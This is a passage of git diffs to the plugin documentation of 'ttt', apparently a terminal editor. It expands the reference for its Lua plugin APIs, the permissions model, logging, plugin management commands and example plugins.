+    if event.key == "r" and event.mod == "" then
       -- refresh data
       reload_data()
       panel:redraw()
@@ -649,10 +979,10 @@ Require the `editor.write` permission.
 
 | Function                                          | Description                                    |
 |---------------------------------------------------|------------------------------------------------|
-| `editor.insert(line, col, text)`                  | Insert text at position.                       |
-| `editor.replace(start_line, start_col, end_line, end_col, text)` | Replace a range with text.     |
-| `editor.set_cursor(line, col)`                    | Move the cursor.                               |
-| `editor.set_selection(start_line, start_col, end_line, end_col)` | Set selection range.           |
+| `editor.insert(line, col, text)`                  | Insert text at position (1-based).             |
+| `editor.replace(start_line, start_col, end_line, end_col, text)` | Replace a range with text (1-based). |
+| `editor.set_cursor(line, col)`                    | Move the cursor (1-based).                     |
+| `editor.set_selection(start_line, start_col, end_line, end_col)` | Set selection range (1-based).     |
 | `editor.clear_selection()`                        | Clear the current selection.                   |
 
 All write operations go through the undo system — they can be undone with Ctrl+Z.
@@ -680,27 +1010,61 @@ The `ttt.fs` module provides file system access.
 local fs = require("ttt.fs")
 ```
 
-| Function             | Permission | Returns                    | Description                    |
-|----------------------|------------|----------------------------|--------------------------------|
-| `fs.read(path)`      | `fs.read`  | string, or nil + error     | Read file contents.            |
-| `fs.write(path, content)` | `fs.write` | nil, or error string  | Write content to file.         |
-| `fs.exists(path)`    | `fs.read`  | boolean                    | Check if path exists.          |
-| `fs.list(path)`      | `fs.read`  | table of `{name, is_dir}`, or nil + error | List directory entries. |
+### `fs.read(path)`
 
-**Example:**
+Read the contents of a file. Requires `fs.read` permission.
+
+**Returns:** `content_string` on success, or `nil, error_string` on failure.
 
 ```lua
-local fs = require("ttt.fs")
-
-if fs.exists("/tmp/config.json") then
-  local content = fs.read("/tmp/config.json")
+local content, err = fs.read("/tmp/config.json")
+if content then
   -- process content
+else
+  ttt.log("error", "Failed to read: " .. err)
 end
+```
 
-local entries = fs.list("/home/user/project")
-for _, entry in ipairs(entries) do
-  if entry.is_dir then
-    -- it's a directory
+### `fs.write(path, content)`
+
+Write content to a file. Requires `fs.write` permission.
+
+**Returns:** nothing on success, or `error_string` on failure.
+
+```lua
+local err = fs.write("/tmp/output.txt", "hello world")
+if err then
+  ttt.log("error", "Failed to write: " .. err)
+end
+```
+
+### `fs.exists(path)`
+
+Check if a file or directory exists. Requires `fs.read` permission.
+
+**Returns:** boolean.
+
+```lua
+if fs.exists("/tmp/config.json") then
+  -- file exists
+end
+```
+
+### `fs.list(path)`
+
+List entries in a directory. Requires `fs.read` permission.
+
+**Returns:** array of `{name, is_dir}` tables on success, or `nil, error_string` on failure.
+
+```lua
+local entries, err = fs.list("/home/user/project")
+if entries then
+  for _, entry in ipairs(entries) do
+    if entry.is_dir then
+      ttt.log("dir: " .. entry.name)
+    else
+      ttt.log("file: " .. entry.name)
+    end
   end
 end
 ```
@@ -715,11 +1079,22 @@ The `ttt.system` module provides command execution and environment variable acce
 local sys = require("ttt.system")
 ```
 
-### `sys.exec(binary, args)`
+### `sys.exec(binary, [args])`
 
-Execute a command synchronously. Requires `system.exec` permission with the binary listed in the allowlist.
+Execute a command synchronously. Requires the `system.exec` permission with the binary listed in the allowlist.
 
-**Returns** a table: `{stdout, stderr, exit_code}`.
+| Parameter | Type   | Required | Description                              |
+|-----------|--------|----------|------------------------------------------|
+| `binary`  | string | yes      | Command to execute. Must be in the `system.exec` permission allowlist. |
+| `args`    | table  | no       | Array of string arguments.               |
+
+**Returns** a table:
+
+| Field       | Type   | Description                                     |
+|-------------|--------|-------------------------------------------------|
+| `stdout`    | string | Standard output.                                |
+| `stderr`    | string | Standard error.                                 |
+| `exit_code` | number | Exit code (`0` for success, `-1` for exec errors). |
 
 ```lua
 local result = sys.exec("git", {"status", "--porcelain"})
@@ -732,16 +1107,28 @@ end
 
 Execute a command asynchronously. The callback receives the same result table and is called on the main thread when the command completes. The UI remains responsive during execution.
 
+| Parameter  | Type     | Required | Description                                  |
+|------------|----------|----------|----------------------------------------------|
+| `binary`   | string   | yes      | Command to execute.                          |
+| `args`     | table    | yes      | Array of string arguments. Pass `{}` if none. |
+| `callback` | function | yes      | Receives the result table when done.         |
+
 ```lua
 sys.exec_async("docker", {"ps", "--format", "{{.Names}}"}, function(result)
-  -- process result.stdout
+  if result.exit_code == 0 then
+    -- process result.stdout
+  end
   panel:redraw()
 end)
 ```
 
+**Important:** For `exec_async`, the `args` table is required (pass `{}` for no arguments). The callback is always the third argument.
+
 ### `sys.env(name)`
 
 Read an environment variable. Requires `system.env` permission.
+
+**Returns:** the value as a string (empty string if not set).
 
 ```lua
 local home = sys.env("HOME")
@@ -757,13 +1144,33 @@ The `ttt.net` module provides HTTP request capabilities. Requires the `network.h
 local net = require("ttt.net")
 ```
 
+### HTTP Response Table
+
+All HTTP functions return (or pass to callbacks) a response table:
+
+| Field     | Type   | Present      | Description                    |
+|-----------|--------|--------------|--------------------------------|
+| `status`  | number | always       | HTTP status code (`0` on error). |
+| `body`    | string | always       | Response body (empty on error). |
+| `headers` | table  | on success   | String-to-string map of response headers. |
+| `error`   | string | on error only | Error message.                 |
+
 ### `net.get(url, [opts])`
 
 Synchronous HTTP GET.
 
+| Parameter | Type   | Required | Description                                |
+|-----------|--------|----------|--------------------------------------------|
+| `url`     | string | yes      | Request URL.                               |
+| `opts`    | table  | no       | Options table with `headers` (string-to-string map). |
+
 ```lua
 local resp = net.get("https://api.example.com/data")
--- resp.status (number), resp.body (string), resp.headers (table), resp.error (string or nil)
+if resp.error then
+  ttt.log("error", resp.error)
+elseif resp.status == 200 then
+  -- process resp.body
+end
 
 -- With custom headers:
 local resp = net.get("https://api.example.com/data", {
@@ -771,9 +1178,14 @@ local resp = net.get("https://api.example.com/data", {
 })
 ```
 
-### `net.post(url, opts)`
+### `net.post(url, [opts])`
 
 Synchronous HTTP POST.
+
+| Parameter | Type   | Required | Description                                |
+|-----------|--------|----------|--------------------------------------------|
+| `url`     | string | yes      | Request URL.                               |
+| `opts`    | table  | no       | Options: `headers` (map) and `body` (string). |
 
 ```lua
 local resp = net.post("https://api.example.com/data", {
@@ -782,12 +1194,37 @@ local resp = net.post("https://api.example.com/data", {
 })
 ```
 
-### Async Variants
+### `net.get_async(url, [opts], callback)`
 
-`net.get_async(url, [opts], callback)` and `net.post_async(url, opts, callback)` work like their sync counterparts but don't block the UI. The callback receives the response table.
+Asynchronous HTTP GET. The callback receives the response table. If `opts` is provided, callback is the third argument; otherwise it is the second.
 
 ```lua
+-- Without options (callback is 2nd arg):
 net.get_async("https://api.example.com/data", function(resp)
+  if resp.status == 200 then
+    -- process resp.body
+    panel:redraw()
+  end
+end)
+
+-- With options (callback is 3rd arg):
+net.get_async("https://api.example.com/data", {
+  headers = { ["Authorization"] = "Bearer token" },
+}, function(resp)
+  -- process response
+  panel:redraw()
+end)
+```
+
+### `net.post_async(url, opts, callback)`
+
+Asynchronous HTTP POST. The `opts` table and callback are both required.
+
+```lua
+net.post_async("https://api.example.com/data", {
+  headers = { ["Content-Type"] = "application/json" },
+  body = '{"key": "value"}',
+}, function(resp)
   if resp.status == 200 then
     -- process resp.body
     panel:redraw()
@@ -811,17 +1248,18 @@ Register an event listener. Multiple listeners can be registered for the same ev
 
 **File events** (require `events.file` permission):
 
-| Event         | Callback argument | Description                 |
-|---------------|-------------------|-----------------------------|
-| `file.open`   | path (string)     | A file was opened.          |
-| `file.close`  | path (string)     | A file tab was closed.      |
-| `file.save`   | path (string)     | A file was saved.           |
+| Event         | Description                 |
+|---------------|-----------------------------|
+| `file.open`   | A file was opened.          |
+| `file.close`  | A file tab was closed.      |
+| `file.save`   | A file was saved.           |
 
 **Editor events** (require `events.editor` permission):
 
-| Event           | Callback argument | Description                 |
-|-----------------|-------------------|-----------------------------|
-| `editor.change` | path (string)     | Buffer content changed.     |
+| Event           | Description                 |
+|-----------------|-----------------------------|
+| `editor.change` | Buffer content changed.     |
+| `cursor.change` | Cursor position changed.    |
 
 **Example:**
 
@@ -834,6 +1272,11 @@ end)
 
 events.on("file.open", function(path)
   -- load file-specific config
+end)
+
+events.on("cursor.change", function()
+  -- update status display
+  panel:redraw()
 end)
 ```
 
@@ -901,9 +1344,7 @@ Use **Plugins: Clear Output** from the command palette to clear the OUTPUT panel
 
 ### Render Errors
 
-If your `render` function throws a Lua error, the plugin panel displays the error message in red (`danger` style) instead of the normal content. The plugin stays loaded and will retry rendering on the next frame — so fixing the error in your Lua file and restarting ttt will recover.
-
-Errors are also logged to stderr, so if you run ttt from a terminal you'll see them there.
+If your `render` function throws a Lua error, the plugin panel displays the error message in red (`danger` style) instead of the normal content. The plugin stays loaded and will retry rendering on the next frame — so fixing the error in your Lua file and reloading will recover.
 
 ### Callback Errors
 
@@ -924,37 +1365,42 @@ If a callback function (`on_select`, `on_click`, etc.) throws an error, it is ca
 
 Permissions are declared in the manifest's `permissions` object. Boolean permissions are set to `true`; array permissions list specific values.
 
-| Permission       | Type     | Description                                       |
+| Permission       | Type     | Gates                                             |
 |------------------|----------|---------------------------------------------------|
-| `panel.sidebar`  | bool     | Register a sidebar panel.                         |
-| `panel.bottom`   | bool     | Register a bottom panel.                          |
-| `panel.drawer`   | bool     | Register a drawer panel. (Reserved for future use.) |
-| `commands`       | bool     | Register commands in the command palette.         |
-| `keybindings`    | bool     | Bind keyboard shortcuts.                          |
-| `editor.read`    | bool     | Read the contents of editor buffers.              |
-| `editor.write`   | bool     | Modify the contents of editor buffers.            |
-| `fs.read`        | bool     | Read files from the file system.                  |
-| `fs.write`       | bool     | Write files to the file system.                   |
-| `system.exec`    | string[] | Execute specific system commands. List each binary. |
-| `system.env`     | bool     | Read environment variables.                       |
-| `network.http`   | bool     | Make outbound HTTP requests.                      |
-| `events.file`    | bool     | Receive file system change events.                |
-| `events.editor`  | bool     | Receive editor events (cursor move, file open, etc.). |
+| `panel.sidebar`  | boolean  | Register a sidebar panel.                         |
+| `panel.bottom`   | boolean  | Register a bottom panel.                          |
+| `panel.drawer`   | boolean  | Register a drawer panel. (Reserved for future use.) |
+| `commands`       | boolean  | Register commands in the command palette.         |
+| `keybindings`    | boolean  | Bind keyboard shortcuts.                          |
+| `editor.read`    | boolean  | Read the contents of editor buffers (`ttt.editor` read functions). |
+| `editor.write`   | boolean  | Modify editor buffers (`ttt.editor` write functions). |
+| `fs.read`        | boolean  | Read files and list directories (`ttt.fs` read functions). |
+| `fs.write`       | boolean  | Write files to the file system (`ttt.fs.write`).  |
+| `system.exec`    | string[] | Execute specific system commands. List each allowed binary name. |
+| `system.env`     | boolean  | Read environment variables (`ttt.system.env`).    |
+| `network.http`   | boolean  | Make outbound HTTP requests (`ttt.net`).          |
+| `events.file`    | boolean  | Listen for file events: `file.open`, `file.close`, `file.save`. |
+| `events.editor`  | boolean  | Listen for editor events: `editor.change`, `cursor.change`. |
 
 **Example with multiple permissions:**
 
 ```json
 {
+  "name": "docker-manager",
+  "description": "Manage Docker containers, images and volumes",
+  "version": "0.1.0",
+  "author": "eugenioenko",
+  "entry": "init.lua",
   "permissions": {
     "panel.sidebar": true,
-    "panel.bottom": true,
-    "system.exec": ["git", "npm"],
-    "fs.read": true
+    "commands": true,
+    "keybindings": true,
+    "system.exec": ["docker"]
   }
 }
 ```
 
-Currently implemented: `panel.sidebar`, `panel.bottom`, `editor.read`, `editor.write`, `fs.read`, `fs.write`, `system.exec`, `system.env`, `network.http`, `events.file`, `events.editor`.
+**How permissions work at runtime:** If a permission is not granted, the corresponding functions are simply not available on the module. For example, without `editor.read`, the `ttt.editor` module will not have `buffer_text`, `cursor`, etc. Calling a function that requires a non-granted permission raises a Lua error.
 
 ---
 
@@ -974,7 +1420,18 @@ Plugins run in a sandboxed Lua 5.1 environment. Only safe standard library modul
 
 **Removed globals:** `dofile`, `loadfile` are set to nil.
 
-**Module loading:** `require()` allows `"ttt"`, `"ttt.editor"`, `"ttt.fs"`, `"ttt.system"`, `"ttt.net"`, and `"ttt.events"`. Any other module name raises an error.
+**Module loading:** `require()` only allows these modules:
+
+| Module         | Description                    |
+|----------------|--------------------------------|
+| `ttt`          | Core module: `register`, `log`, `confirm`, `show_info` |
+| `ttt.editor`   | Editor buffer read/write       |
+| `ttt.fs`       | Filesystem access              |
+| `ttt.system`   | Command execution, env vars    |
+| `ttt.net`      | HTTP requests                  |
+| `ttt.events`   | Event listeners                |
+
+Any other module name passed to `require()` raises an error.
 
 ---
 
@@ -984,8 +1441,8 @@ Plugins run in a sandboxed Lua 5.1 environment. Only safe standard library modul
 
 Open the **Plugins** tab in the sidebar (`Plugins: Show Panel` from the command palette) to see installed and available plugins. The panel has two sections:
 
-- **INSTALLED** — Lists all installed plugins with their status and version. Action buttons let you update or remove plugins.
-- **AVAILABLE** — Fetched from the vetted plugin registry. Click to install.
+- **INSTALLED** -- Lists all installed plugins with their status and version. Action buttons let you update or remove plugins.
+- **AVAILABLE** -- Fetched from the vetted plugin registry. Click to install.
 
 ### Installing
 
@@ -1025,6 +1482,10 @@ Manual removal:
 rm -rf ~/.config/ttt/plugins/my-plugin
 ```
 
+### Enabling / Disabling
+
+Run **Plugins: Enable** or **Plugins: Disable** from the command palette to toggle a plugin without removing it. Disabled plugins retain their permissions in the registry.
+
 ---
 
 ## Examples
@@ -1046,21 +1507,21 @@ local ttt = require("ttt")
 
 local tree = {
   {
-    id = "src", label = "src/", icon = "📁", expandable = true, expanded = true,
+    id = "src", label = "src/", icon = ">", expandable = true, expanded = true,
     children = {
-      { id = "src/main.go", label = "main.go", icon = "📄" },
-      { id = "src/server.go", label = "server.go", icon = "📄" },
+      { id = "src/main.go", label = "main.go", icon = " " },
+      { id = "src/server.go", label = "server.go", icon = " " },
       {
-        id = "src/handlers", label = "handlers/", icon = "📁", expandable = true,
+        id = "src/handlers", label = "handlers/", icon = ">", expandable = true,
         children = {
-          { id = "src/handlers/auth.go", label = "auth.go", icon = "📄" },
-          { id = "src/handlers/api.go", label = "api.go", icon = "📄" },
+          { id = "src/handlers/auth.go", label = "auth.go", icon = " " },
+          { id = "src/handlers/api.go", label = "api.go", icon = " " },
         },
       },
     },
   },
-  { id = "go.mod", label = "go.mod", icon = "📄", muted = true },
-  { id = "README.md", label = "README.md", icon = "📄", muted = true },
+  { id = "go.mod", label = "go.mod", icon = " ", muted = true },
+  { id = "README.md", label = "README.md", icon = " ", muted = true },
 }
 
 local selected_file = nil
@@ -1106,8 +1567,6 @@ local query = ""
 local function do_search(text)
   query = text
   results = {}
-  -- In a real plugin with fs.read permission, you'd search files here.
-  -- For demo, generate fake results:
   if #text > 0 then
     for i = 1, 5 do
       table.insert(results, {
@@ -1125,7 +1584,7 @@ ttt.register({
     render = function(panel)
       panel:input({
         placeholder = "Search...",
-        prefix = "🔍 ",
+        prefix = "# ",
         on_change = function(text)
           do_search(text)
           panel:redraw()
@@ -1140,7 +1599,7 @@ ttt.register({
         panel:list({
           items = results,
           on_select = function(node)
-            -- In a real plugin, you'd open the file at the matching line
+            -- open the file at the matching line
           end,
         })
       elseif #query > 0 then
@@ -1151,7 +1610,7 @@ ttt.register({
 })
 ```
 
-### Raw Cell Drawing — Progress Bar
+### Raw Cell Drawing -- Progress Bar
 
 A sidebar panel using only the raw cell API:
 
@@ -1176,19 +1635,17 @@ ttt.register({
 
       panel:text(0, 0, "Build Progress", "muted")
 
-      -- Draw progress bar
       local bar_w = w - 2
       local filled = math.floor(bar_w * progress)
 
       for x = 0, bar_w - 1 do
         if x < filled then
-          panel:cell(x + 1, 2, "█", "success")
+          panel:cell(x + 1, 2, "#", "success")
         else
-          panel:cell(x + 1, 2, "░", "muted")
+          panel:cell(x + 1, 2, ".", "muted")
         end
       end
 
-      -- Draw percentage
       local pct = math.floor(progress * 100) .. "%"
       panel:text(1, 4, pct, "default")
     end,
@@ -1196,91 +1653,119 @@ ttt.register({
 })
 ```
 
-### TODO List (Sidebar + Bottom)
+### Context Menu with Tree
 
-A plugin that registers both a sidebar list and a bottom detail view:
+A sidebar panel demonstrating context menus on tree items:
 
 ```json
 {
-  "name": "todo-list",
+  "name": "context-menu-demo",
   "entry": "init.lua",
-  "version": "0.1.0",
-  "permissions": {
-    "panel.sidebar": true,
-    "panel.bottom": true
-  }
+  "permissions": { "panel.sidebar": true }
 }
 ```
 
 ```lua
 local ttt = require("ttt")
 
-local todos = {
-  { id = "1", label = "Write plugin docs", done = false },
-  { id = "2", label = "Add tests", done = false },
-  { id = "3", label = "Ship it!", done = false },
+local items = {
+  { id = "item1", label = "First item" },
+  { id = "item2", label = "Second item" },
+  { id = "item3", label = "Third item" },
 }
-
-local selected = nil
-
-local function todo_items()
-  local items = {}
-  for _, t in ipairs(todos) do
-    table.insert(items, {
-      id = t.id,
-      label = t.label,
-      muted = t.done,
-      badge = t.done and "✓" or "",
-    })
-  end
-  return items
-end
 
 ttt.register({
   sidebar = {
-    title = "TODOs",
+    title = "Context Menu",
     render = function(panel)
-      panel:label({ text = #todos .. " tasks", style = "muted" })
       panel:list({
-        items = todo_items(),
+        items = items,
         on_select = function(node)
-          selected = node.id
-          -- toggle done
-          for _, t in ipairs(todos) do
-            if t.id == node.id then
-              t.done = not t.done
-              break
-            end
+          ttt.log("Selected: " .. node.label)
+        end,
+        on_command = function(command, node)
+          if command == "delete" then
+            ttt.confirm("Delete '" .. node.label .. "'?", function()
+              for i, item in ipairs(items) do
+                if item.id == node.id then
+                  table.remove(items, i)
+                  break
+                end
+              end
+              panel:redraw()
+            end)
+          elseif command == "rename" then
+            ttt.log("Rename " .. node.label)
           end
-          panel:redraw()
         end,
-      })
-      panel:button({
-        label = "&Add Task",
-        on_click = function()
-          local id = tostring(#todos + 1)
-          table.insert(todos, { id = id, label = "New task " .. id, done = false })
-          panel:redraw()
-        end,
+        node_menu = {
+          { label = "Rename", command = "rename" },
+          { separator = true },
+          { label = "Delete", command = "delete" },
+        },
       })
     end,
   },
-  bottom = {
-    title = "Task Detail",
+})
+```
+
+### Layout with VStack and Box
+
+Demonstrates using VStack and Box for structured layouts:
+
+```json
+{
+  "name": "layout-demo",
+  "entry": "init.lua",
+  "permissions": { "panel.sidebar": true }
+}
+```
+
+```lua
+local ttt = require("ttt")
+
+local containers = {
+  { id = "web", label = "web-app", badge = "nginx:latest" },
+  { id = "db", label = "postgres", badge = "postgres:15" },
+}
+
+ttt.register({
+  sidebar = {
+    title = "Layout",
     render = function(panel)
-      if selected == nil then
-        panel:label({ text = "Select a task in the sidebar", style = "muted" })
-        return
-      end
-      for _, t in ipairs(todos) do
-        if t.id == selected then
-          panel:label("Task: " .. t.label)
-          panel:label({ text = "Status: " .. (t.done and "Done" or "Pending"),
-                        style = t.done and "success" or "warning" })
-          return
-        end
-      end
-      panel:label({ text = "Task not found", style = "danger" })
+      -- Section 1: Containers
+      panel:vstack({
+        render = function(p)
+          p:label({ text = "Containers", badge = tostring(#containers), padding_left = 1 })
+          p:box({
+            border = true,
+            render = function(bp)
+              bp:list({
+                items = containers,
+                on_select = function(node)
+                  ttt.log("Selected: " .. node.label)
+                end,
+              })
+            end,
+          })
+        end,
+      })
+
+      -- Section 2: Info
+      panel:vstack({
+        render = function(p)
+          p:label({ text = "Details", padding_left = 1, margin_top = 1 })
+          p:box({
+            border = true,
+            render = function(bp)
+              bp:keyvalue({
+                { key = "Status", value = "Running" },
+                { key = "Uptime", value = "2h 30m" },
+              })
+            end,
+          })
+        end,
+      })
     end,
   },
 })
@@ -1367,7 +1852,6 @@ refresh(nil)
 
 -- Auto-refresh after file saves
 events.on("file.save", function(path)
-  -- Use exec_async to avoid blocking the UI
   sys.exec_async("git", {"status", "--porcelain"}, function(result)
     if result.exit_code == 0 then
       error_msg = nil
@@ -1386,3 +1870,16 @@ events.on("file.save", function(path)
   end)
 end)
 ```
+
+### Reference Plugin
+
+For a complete, production-quality example, see the [Docker Manager plugin](../plugins/docker-manager/) included in this repository. It demonstrates:
+
+- Sidebar panel with multiple sections using VStack and Box
+- Header actions menu with `actions` and `on_action`
+- Async system commands with `exec_async`
+- Context menus on list items with `node_menu` and `on_command`
+- Confirmation dialogs with `ttt.confirm`
+- Command palette commands and keybindings
+- Reactive state management with `panel:redraw()`
+- Fallback key handling with `on_event`

--- a/docs/PLUGINS.md
+++ b/docs/PLUGINS.md
@@ -28,6 +28,7 @@ ttt supports Lua plugins that can render panels in the sidebar and bottom panel 
 - [Network API](#network-api)
 - [Events API](#events-api)
 - [Styles](#styles)
+- [Logging](#logging)
 - [Error Handling and Debugging](#error-handling-and-debugging)
 - [Permissions Reference](#permissions-reference)
 - [Lua Sandbox](#lua-sandbox)
@@ -122,13 +123,13 @@ When ttt exits, all plugin Lua VMs are closed. Plugins don't need cleanup logic 
 
 ### Reloading
 
-Currently, plugins are only loaded at startup. To reload a plugin after editing its Lua files, restart ttt.
+Run **Plugins: Reload** from the command palette to reload a plugin without restarting ttt. This destroys the plugin's Lua VM, re-reads the manifest, and re-initializes. State is reset — local variables start fresh. Use **Plugins: Reload All** to reload every loaded plugin at once.
 
 ---
 
 ## Registration
 
-The entry point Lua file must call `ttt.register()` to declare what the plugin provides. This is the only function available on the `ttt` module.
+The entry point Lua file must call `ttt.register()` to declare what the plugin provides. The `ttt` module also provides `ttt.log()` for logging (see [Logging](#logging)).
 
 `ttt.register()` accepts a table with `sidebar`, `bottom`, `commands`, and/or `keybindings` fields. A plugin can register any combination:
 
@@ -867,6 +868,35 @@ If an unrecognized style name is used, it falls back to `default`.
 
 ---
 
+## Logging
+
+Plugins can write messages to the **OUTPUT** bottom panel using `ttt.log()`. No permission is required.
+
+```lua
+local ttt = require("ttt")
+
+-- Single argument defaults to "info" level
+ttt.log("plugin loaded successfully")
+
+-- Two arguments: level and message
+ttt.log("warn", "config file not found, using defaults")
+ttt.log("error", "failed to connect to service")
+```
+
+| Level   | Display                          |
+|---------|----------------------------------|
+| `info`  | Default text color               |
+| `warn`  | Warning color (yellow)           |
+| `error` | Danger color (red)               |
+
+Messages appear in the OUTPUT panel with a timestamp and plugin name prefix: `15:04:05 [my-plugin] message`. Open the OUTPUT panel via the bottom panel tabs.
+
+Plugin errors (init failures, render crashes, callback errors) are automatically routed to the OUTPUT panel as error-level messages, so you don't need to wrap everything in `pcall` for visibility.
+
+Use **Plugins: Clear Output** from the command palette to clear the OUTPUT panel.
+
+---
+
 ## Error Handling and Debugging
 
 ### Render Errors
@@ -882,8 +912,10 @@ If a callback function (`on_select`, `on_click`, etc.) throws an error, it is ca
 ### Debugging Tips
 
 - **Start simple.** Begin with a single `panel:label()` to verify your plugin loads, then add complexity.
-- **Use labels for debugging.** Since there's no `print()` to the console, use `panel:label()` to display variable values in your panel.
+- **Use `ttt.log()` for debugging.** Write diagnostic messages to the OUTPUT panel: `ttt.log("value is: " .. tostring(x))`.
+- **Check the OUTPUT panel.** Plugin errors automatically appear here. Open it from the bottom panel tabs.
 - **Check the plugin list.** Open the command palette and run **Plugins: List Installed** to see status (enabled/disabled/error) and version for each plugin.
+- **Use reload for fast iteration.** Run **Plugins: Reload** from the command palette to reload your plugin without restarting ttt.
 - **Watch stderr.** Run ttt from a terminal to see error logs: `ttt 2>plugin-errors.log`.
 
 ---

--- a/docs/PLUGINS.md
+++ b/docs/PLUGINS.md
@@ -7,6 +7,8 @@ ttt supports Lua plugins that can render panels in the sidebar and bottom panel 
 - [Getting Started](#getting-started)
 - [Plugin Lifecycle](#plugin-lifecycle)
 - [Registration](#registration)
+  - [Commands](#commands)
+  - [Keybindings](#keybindings)
 - [Widget API](#widget-api)
   - [Label](#label)
   - [Tree](#tree)
@@ -128,7 +130,7 @@ Currently, plugins are only loaded at startup. To reload a plugin after editing 
 
 The entry point Lua file must call `ttt.register()` to declare what the plugin provides. This is the only function available on the `ttt` module.
 
-`ttt.register()` accepts a table with `sidebar` and/or `bottom` fields. A plugin can register both:
+`ttt.register()` accepts a table with `sidebar`, `bottom`, `commands`, and/or `keybindings` fields. A plugin can register any combination:
 
 ```lua
 local ttt = require("ttt")
@@ -148,8 +150,18 @@ ttt.register({
     render = function(panel) end,
     on_event = function(event) end,
   },
+  commands = {
+    { id = "myplugin.doSomething", title = "My Plugin: Do Something", handler = function()
+      -- command logic here
+    end },
+  },
+  keybindings = {
+    { key = "ctrl+k d", command = "myplugin.doSomething" },
+  },
 })
 ```
+
+### Panel Fields
 
 | Field      | Required | Description                                                    |
 |------------|----------|----------------------------------------------------------------|
@@ -160,6 +172,31 @@ ttt.register({
 **Sidebar** panels appear in the left sidebar alongside the file explorer. They require the `panel.sidebar` permission.
 
 **Bottom** panels appear in the bottom panel alongside the terminal. They require the `panel.bottom` permission.
+
+### Commands
+
+Plugins can register commands that appear in the command palette. Requires the `commands` permission.
+
+Each command entry is a table with:
+
+| Field     | Required | Description                              |
+|-----------|----------|------------------------------------------|
+| `id`      | yes      | Unique command ID (e.g. `myplugin.run`). |
+| `title`   | yes      | Display title in the command palette.     |
+| `handler` | yes      | Function called when the command runs.    |
+
+### Keybindings
+
+Plugins can register keyboard shortcuts for their commands. Requires the `keybindings` permission.
+
+Each keybinding entry is a table with:
+
+| Field     | Required | Description                                           |
+|-----------|----------|-------------------------------------------------------|
+| `key`     | yes      | Key combination string (e.g. `ctrl+k d` for a chord). |
+| `command` | yes      | Command ID to execute when the key is pressed.        |
+
+Use `ctrl+k <key>` chords for plugin keybindings to avoid conflicts with built-in shortcuts. Avoid `ctrl+shift` combos — they are unreliable in many terminals.
 
 ---
 
@@ -911,29 +948,50 @@ Plugins run in a sandboxed Lua 5.1 environment. Only safe standard library modul
 
 ## Managing Plugins
 
+### Plugins Panel
+
+Open the **Plugins** tab in the sidebar (`Plugins: Show Panel` from the command palette) to see installed and available plugins. The panel has two sections:
+
+- **INSTALLED** — Lists all installed plugins with their status and version. Action buttons let you update or remove plugins.
+- **AVAILABLE** — Fetched from the vetted plugin registry. Click to install.
+
 ### Installing
+
+**From the command palette:**
+
+1. Run **Plugins: Install from URL**
+2. Enter a git repository URL (e.g. `https://github.com/author/ttt-docker`)
+3. The plugin is cloned into `~/.config/ttt/plugins/<name>/`
+4. An approval dialog shows the requested permissions
+5. Click **Allow** to load the plugin immediately
+
+**Manual installation:**
 
 Copy or clone the plugin directory into `~/.config/ttt/plugins/`:
 
 ```sh
-cp -r my-plugin ~/.config/ttt/plugins/
+git clone https://github.com/author/ttt-my-plugin ~/.config/ttt/plugins/my-plugin
 ```
 
 Restart ttt. If the plugin is new, you'll see an approval dialog.
 
 ### Plugin List
 
-Open the command palette (`Ctrl+Shift+P`) and run **Plugins: List Installed** to see all installed plugins with their status and version.
+Open the command palette and run **Plugins: List Installed** to see all installed plugins with their status and version.
+
+### Updating
+
+Run **Plugins: Update** from the command palette and select a plugin. This runs `git pull` in the plugin directory. If the updated manifest requests new permissions, the plugin is disabled and you'll be prompted to re-approve.
 
 ### Removing
 
-Delete the plugin directory:
+Run **Plugins: Uninstall** from the command palette and select a plugin. This removes the plugin directory and its registry entry.
+
+Manual removal:
 
 ```sh
 rm -rf ~/.config/ttt/plugins/my-plugin
 ```
-
-The approval record in `~/.config/ttt/plugins.ttt.json` can be left — it's harmless and will be ignored.
 
 ---
 

--- a/docs/PLUGINS.md
+++ b/docs/PLUGINS.md
@@ -20,6 +20,11 @@ ttt supports Lua plugins that can render panels in the sidebar and bottom panel 
 - [Reconciliation and State Preservation](#reconciliation-and-state-preservation)
 - [Focus and Keyboard Navigation](#focus-and-keyboard-navigation)
 - [Event Handling](#event-handling)
+- [Editor API](#editor-api)
+- [Filesystem API](#filesystem-api)
+- [System API](#system-api)
+- [Network API](#network-api)
+- [Events API](#events-api)
 - [Styles](#styles)
 - [Error Handling and Debugging](#error-handling-and-debugging)
 - [Permissions Reference](#permissions-reference)
@@ -576,6 +581,226 @@ end
 
 ---
 
+## Editor API
+
+The `ttt.editor` module provides read and write access to the active editor buffer. All line and column numbers are **1-based** in Lua.
+
+```lua
+local editor = require("ttt.editor")
+```
+
+### Read Functions
+
+Require the `editor.read` permission.
+
+| Function               | Returns                                                   | Description                          |
+|------------------------|-----------------------------------------------------------|--------------------------------------|
+| `editor.buffer_text()` | string                                                    | Full buffer content as a single string. |
+| `editor.buffer_lines()`| table of strings                                          | Array of lines.                      |
+| `editor.current_line()`| string                                                    | Text of the line at cursor.          |
+| `editor.cursor()`      | `{line, col}`                                             | Current cursor position (1-based).   |
+| `editor.selection()`   | `{active, start_line, start_col, end_line, end_col}`     | Selection state (1-based). `active` is boolean. |
+| `editor.selection_text()` | string                                                 | Selected text (empty if no selection).|
+| `editor.file_path()`   | string                                                    | Absolute path of the active file.    |
+| `editor.file_name()`   | string                                                    | Filename only.                       |
+| `editor.language()`    | string                                                    | Detected language (e.g. `"go"`, `"lua"`). |
+
+### Write Functions
+
+Require the `editor.write` permission.
+
+| Function                                          | Description                                    |
+|---------------------------------------------------|------------------------------------------------|
+| `editor.insert(line, col, text)`                  | Insert text at position.                       |
+| `editor.replace(start_line, start_col, end_line, end_col, text)` | Replace a range with text.     |
+| `editor.set_cursor(line, col)`                    | Move the cursor.                               |
+| `editor.set_selection(start_line, start_col, end_line, end_col)` | Set selection range.           |
+| `editor.clear_selection()`                        | Clear the current selection.                   |
+
+All write operations go through the undo system — they can be undone with Ctrl+Z.
+
+**Example:**
+
+```lua
+local editor = require("ttt.editor")
+
+-- Read cursor position and current line
+local pos = editor.cursor()
+local line = editor.current_line()
+
+-- Insert text at cursor
+editor.insert(pos.line, pos.col, "// TODO: ")
+```
+
+---
+
+## Filesystem API
+
+The `ttt.fs` module provides file system access.
+
+```lua
+local fs = require("ttt.fs")
+```
+
+| Function             | Permission | Returns                    | Description                    |
+|----------------------|------------|----------------------------|--------------------------------|
+| `fs.read(path)`      | `fs.read`  | string, or nil + error     | Read file contents.            |
+| `fs.write(path, content)` | `fs.write` | nil, or error string  | Write content to file.         |
